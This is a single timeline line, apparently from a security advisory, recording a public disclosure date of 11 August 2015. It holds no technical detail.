11-Aug-2015: Public disclosure